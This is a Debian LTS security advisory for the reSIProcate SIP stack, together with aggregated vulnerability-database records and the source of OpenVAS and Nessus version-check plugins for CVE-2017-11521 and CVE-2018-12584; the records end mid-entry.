Package : resiprocate
Version : 1.8.5-4+deb7u1
CVE ID : CVE-2017-11521
CVE-2017-11521
The SdpContents::Session::Medium::parse function in
resip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote
attackers to cause a denial of service (memory consumption) by
triggering many media connections.
For Debian 7 "Wheezy", these problems have been fixed in version
1.8.5-4+deb7u1.
We recommend that you upgrade your resiprocate packages.
Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
{"veracode": [{"lastseen": "2022-07-26T16:32:43", "description": "resiprocate is vulnerable to denial of service. The `SdpContents::Session::Medium::parse` function in `resip/stack/SdpContents.cxx` allows remote attackers to crash the application via multiple media connections.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-13T06:29:01", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521"], "modified": "2021-12-30T07:14:21", "id": "VERACODE:31188", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-31188/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2020-01-29T20:12:14", "description": "CVE-2017-11521\nThe SdpContents::Session::Medium::parse function in\nresip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote\nattackers to cause a denial of service (memory consumption) by\ntriggering many media connections.", "cvss3": {}, "published": "2018-02-08T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for resiprocate (DLA-1040-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11521"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891040", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891040", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891040\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-11521\");\n script_name(\"Debian LTS: Security Advisory for resiprocate (DLA-1040-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-08 00:00:00 +0100 (Thu, 08 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/07/msg00033.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"resiprocate on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1.8.5-4+deb7u1.\n\nWe recommend that you upgrade your resiprocate packages.\");\n\n script_tag(name:\"summary\", value:\"CVE-2017-11521\nThe SdpContents::Session::Medium::parse function in\nresip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote\nattackers to cause a denial of service (memory consumption) by\ntriggering many media connections.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libresiprocate-1.8\", ver:\"1.8.5-4+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libresiprocate-1.8-dev\", ver:\"1.8.5-4+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libresiprocate-turn-client-1.8\", ver:\"1.8.5-4+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libresiprocate-turn-client-1.8-dev\", ver:\"1.8.5-4+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"repro\", ver:\"1.8.5-4+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"resiprocate-turn-server\", ver:\"1.8.5-4+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"sipdialer\", ver:\"1.8.5-4+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-29T20:09:27", "description": "CVE-2018-12584\nA flaw in function ConnectionBase::preparseNewBytes of\nresip/stack/ConnectionBase.cxx has been detected, that\nallows remote attackers to cause a denial of service\n(buffer overflow) or possibly execute arbitrary code\nwhen TLS communication is enabled.\n\nCVE-2017-11521\nA flaw in function SdpContents::Session::Medium::parse of\nresip/stack/SdpContents.cxx has been detected, that allows\nremote attackers to cause a denial of service (memory\nconsumption) by triggering many media connections.", "cvss3": {}, "published": "2018-07-25T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for resiprocate (DLA-1439-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891439", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891439", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891439\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-11521\", \"CVE-2018-12584\");\n script_name(\"Debian LTS: Security Advisory for resiprocate (DLA-1439-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-07-25 00:00:00 +0200 (Wed, 25 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"resiprocate on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1:1.9.7-5+deb8u1.\n\nWe recommend that you upgrade your resiprocate packages.\");\n\n script_tag(name:\"summary\", value:\"CVE-2018-12584\nA flaw in function ConnectionBase::preparseNewBytes of\nresip/stack/ConnectionBase.cxx has been detected, that\nallows remote attackers to cause a denial of service\n(buffer overflow) or possibly execute arbitrary code\nwhen TLS communication is enabled.\n\nCVE-2017-11521\nA flaw in function SdpContents::Session::Medium::parse of\nresip/stack/SdpContents.cxx has been detected, that allows\nremote attackers to cause a denial of service (memory\nconsumption) by triggering many media connections.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"librecon-1.9\", ver:\"1:1.9.7-5+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"librecon-1.9-dev\", ver:\"1:1.9.7-5+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libresiprocate-1.9\", ver:\"1:1.9.7-5+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libresiprocate-1.9-dev\", ver:\"1:1.9.7-5+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libresiprocate-turn-client-1.9\", ver:\"1:1.9.7-5+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libresiprocate-turn-client-1.9-dev\", ver:\"1:1.9.7-5+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"repro\", ver:\"1:1.9.7-5+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"resiprocate-turn-server\", ver:\"1:1.9.7-5+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"sipdialer\", ver:\"1:1.9.7-5+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-07-21T08:20:28", "description": "\n* [CVE-2017-11521](https://security-tracker.debian.org/tracker/CVE-2017-11521)\nThe SdpContents::Session::Medium::parse function in\n resip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote\n attackers to cause a denial of service (memory consumption) by\n triggering many media connections.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.8.5-4+deb7u1.\n\n\nWe recommend that you upgrade your resiprocate packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-07-26T00:00:00", "type": "osv", "title": "resiprocate - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521"], "modified": "2022-07-21T05:51:43", "id": "OSV:DLA-1040-1", "href": "https://osv.dev/vulnerability/DLA-1040-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-21T08:19:19", "description": "\n* [CVE-2018-12584](https://security-tracker.debian.org/tracker/CVE-2018-12584)\nA flaw in function ConnectionBase::preparseNewBytes of\n resip/stack/ConnectionBase.cxx has been detected, that\n allows remote attackers to cause a denial of service\n (buffer overflow) or possibly execute arbitrary code\n when TLS communication is enabled.\n* [CVE-2017-11521](https://security-tracker.debian.org/tracker/CVE-2017-11521)\nA flaw in function SdpContents::Session::Medium::parse of\n resip/stack/SdpContents.cxx has been detected, that allows\n remote attackers to cause a denial of service (memory\n consumption) by triggering many media connections.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n1:1.9.7-5+deb8u1.\n\n\nWe recommend that you upgrade your resiprocate packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-24T00:00:00", "type": "osv", "title": "resiprocate - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2022-07-21T05:52:12", "id": "OSV:DLA-1439-1", "href": "https://osv.dev/vulnerability/DLA-1439-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:14:45", "description": "\nTwo vulnerabilities were fixed in the reSIProcate SIP stack.\n\n\n* [CVE-2017-11521](https://security-tracker.debian.org/tracker/CVE-2017-11521)\nThe SdpContents::Session::Medium::parse function allowed remote\n attackers to cause a denial of service.\n* [CVE-2018-12584](https://security-tracker.debian.org/tracker/CVE-2018-12584)\nThe ConnectionBase::preparseNewBytes function allowed remote\n attackers to cause a denial of service or possibly execute arbitrary\n code when TLS communication is enabled.\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n1:1.11.0~beta1-3+deb9u2.\n\n\nWe recommend that you upgrade your resiprocate packages.\n\n\nFor the detailed security status of resiprocate please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/resiprocate>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-29T00:00:00", "type": "osv", "title": "resiprocate - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2022-07-21T05:53:59", "id": "OSV:DLA-2865-1", "href": "https://osv.dev/vulnerability/DLA-2865-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-04-06T23:38:25", "description": "The SdpContents::Session::Medium::parse function in resip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote attackers to cause a denial of service (memory consumption) by triggering many media connections.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-07-22T18:29:00", "type": "debiancve", "title": "CVE-2017-11521", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521"], "modified": "2017-07-22T18:29:00", "id": "DEBIANCVE:CVE-2017-11521", "href": "https://security-tracker.debian.org/tracker/CVE-2017-11521", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2022-04-06T21:33:46", "description": "The SdpContents::Session::Medium::parse function in resip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote attackers to cause a denial of service (memory consumption) by triggering many media connections.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-07-22T18:29:00", "type": "cve", "title": "CVE-2017-11521", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521"], "modified": "2022-04-06T18:34:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:resiprocate:resiprocate:1.10.2"], "id": "CVE-2017-11521", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11521", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:resiprocate:resiprocate:1.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2023-01-11T14:31:48", "description": "CVE-2017-11521 The SdpContents::Session::Medium::parse function in resip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote attackers to cause a denial of service (memory consumption) by triggering many media connections.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.8.5-4+deb7u1.\n\nWe recommend that you upgrade your resiprocate packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-07-27T00:00:00", "type": "nessus", "title": "Debian DLA-1040-1 : resiprocate security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libresiprocate-1.8", "p-cpe:/a:debian:debian_linux:libresiprocate-1.8-dev", "p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.8", "p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.8-dev", "p-cpe:/a:debian:debian_linux:repro", "p-cpe:/a:debian:debian_linux:resiprocate-turn-server", "p-cpe:/a:debian:debian_linux:sipdialer", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1040.NASL", "href": "https://www.tenable.com/plugins/nessus/101982", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1040-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101982);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-11521\");\n\n script_name(english:\"Debian DLA-1040-1 : resiprocate security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2017-11521 The SdpContents::Session::Medium::parse function in\nresip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote\nattackers to cause a denial of service (memory consumption) by\ntriggering many media connections.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.8.5-4+deb7u1.\n\nWe recommend that you upgrade your resiprocate packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/07/msg00033.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/resiprocate\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-1.8-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.8-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:repro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:resiprocate-turn-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sipdialer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libresiprocate-1.8\", reference:\"1.8.5-4+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libresiprocate-1.8-dev\", reference:\"1.8.5-4+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libresiprocate-turn-client-1.8\", reference:\"1.8.5-4+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libresiprocate-turn-client-1.8-dev\", reference:\"1.8.5-4+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"repro\", reference:\"1.8.5-4+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"resiprocate-turn-server\", reference:\"1.8.5-4+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"sipdialer\", reference:\"1.8.5-4+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:59:32", "description": "The remote Debian 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the dla-2865 advisory.\n\n - The SdpContents::Session::Medium::parse function in resip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote attackers to cause a denial of service (memory consumption) by triggering many media connections. (CVE-2017-11521)\n\n - The ConnectionBase::preparseNewBytes function in 